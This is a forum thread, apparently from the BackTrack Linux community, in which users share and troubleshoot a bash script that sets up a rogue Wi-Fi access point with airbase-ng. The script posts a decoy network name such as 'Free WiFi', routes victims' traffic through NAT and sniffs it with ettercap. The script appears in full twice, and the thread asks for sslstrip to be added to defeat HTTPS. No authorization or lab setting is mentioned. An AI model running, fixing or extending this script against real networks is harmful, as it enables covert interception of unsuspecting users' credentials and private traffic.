rogue AP + MITM (tutorial or script request)

[Lucifer]

Update: I've made my own tutorial by now: http://www.backtrack-linux.org/forum...-sniffing.html

Cheers

[lupin]

That page is still available in Google Cache. It doesnt appear to have been archived. Get it while its hot by searching Goole for the following:

Code:

cache:http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-tutorial.html

[Lucifer]

lupin, thank you for replying.
I've tried the link you've provided, but it doesn't seem to work, or I don't know how to get it.
I've just tried to open it in a webbrowser, but the page wasn't avaible.

cheers

[wesmagyar]

lupin, thank you for replying.
I've tried the link you've provided, but it doesn't seem to work, or I don't know how to get it.
I've just tried to open it in a webbrowser, but the page wasn't avaible.

cheers

as the man said "Search Google" with what he pasted...
-Wes-

[Kalibur]

Hey there,

I came across the same problem. The cached website is just trying to download images and other stuff we don't need, which it is unable to.

The solution is to click "Text-only version" in the top left of the page. This strips all the graphics out and just shows you the text, which is all we need to get going. If you have any other bookmarked pages you want to view the same way, load the page in your browser, copy the URL, google it, then click "cached" under the result that's given, and click "Text-only version" to see the text.

Hope this helps,
Kalibur

[Lucifer]

Thanks for your help guys.
Now, I'm trying to run the script, but I'm having some trouble with dhcp.
the tutorial/script from the old forum was made for backtrack 3, and needs some updates.
can someone with knowledge review this script?
I modified it a bit as it used 'dhcpd', but I think backtrack 4 final uses 'dhcp3', but the dhcp server isn't working properly, it must be the code that's wrong, I never coded anything before, and my backtrack/linux skills are still very limited, so please bear with me.
I'm using this dhcpd.conf: Deathray [bash] Paste - f1859fad7 - Pastebin.com
the current script:
-----------------------
#!/bin/bash
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
kill `cat /var/run/dhcpd.pid`
killall -9 dhcpd3 airbase-ng ettercap
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
modprobe tun
konsole -e airbase-ng -e "$ESSID" -P -C 15 -v $WIFACE &
sleep 10
ifconfig at0 mtu 1400
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
echo > '/var/lib/dhcp3/dhcpd.leases'
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd &
konsole -e dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &
konsole -e ettercap -T -q -p -i at0 // // &
sleep 8
echo "1" > /proc/sys/net/ipv4/ip_forward

the part that's highlighted is what must be wrong, or the dhcpd.conf isn't right.
also, would someone be so kind to add sslstrip function to this script?
any help is greatly appreciated.

credit goes out to Deathray for making the script.

L.

[Lucifer]

Somebody? I'll be very thankfull if you can help me get this script right. the DHCP server part is wrong, when I connect to thefake ap, I'm getting an IP, but no internet. maybe the gateway is wrong. I'm really searching in the dark about how to configure the dhcp.conf, some help would be great.

Lucifer

[Deathray]

credit goes out to Deathray for making the script.

I'm back from the dead I gave up my time for security and Linux once school started to concentrate on that, practically everything we learned about was related to Microsoft in some way so wanted 100% concentration for school. But I'm done now, got a steady job and I'm going to try and pick up on it all once again. So hi! Hope everyone is doing good

[l3g10n]

Thanks for your help guys.
Now, I'm trying to run the script, but I'm having some trouble with dhcp.
the tutorial/script from the old forum was made for backtrack 3, and needs some updates.
can someone with knowledge review this script?
I modified it a bit as it used 'dhcpd', but I think backtrack 4 final uses 'dhcp3', but the dhcp server isn't working properly, it must be the code that's wrong, I never coded anything before, and my backtrack/linux skills are still very limited, so please bear with me.
I'm using this dhcpd.conf: Deathray [bash] Paste - f1859fad7 - Pastebin.com
the current script:
-----------------------
#!/bin/bash
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
kill `cat /var/run/dhcpd.pid`
killall -9 dhcpd3 airbase-ng ettercap
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
modprobe tun
konsole -e airbase-ng -e "$ESSID" -P -C 15 -v $WIFACE &
sleep 10
ifconfig at0 mtu 1400
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
echo > '/var/lib/dhcp3/dhcpd.leases'
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd &
konsole -e dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &
konsole -e ettercap -T -q -p -i at0 // // &
sleep 8
echo "1" > /proc/sys/net/ipv4/ip_forward

the part that's highlighted is what must be wrong, or the dhcpd.conf isn't right.
also, would someone be so kind to add sslstrip function to this script?
any help is greatly appreciated.

credit goes out to Deathray for making the script.

L.

Check out this thread. I modded his script to work with BT4, and added some minor things to it.
http://www.backtrack-linux.org/forum...tml#post157888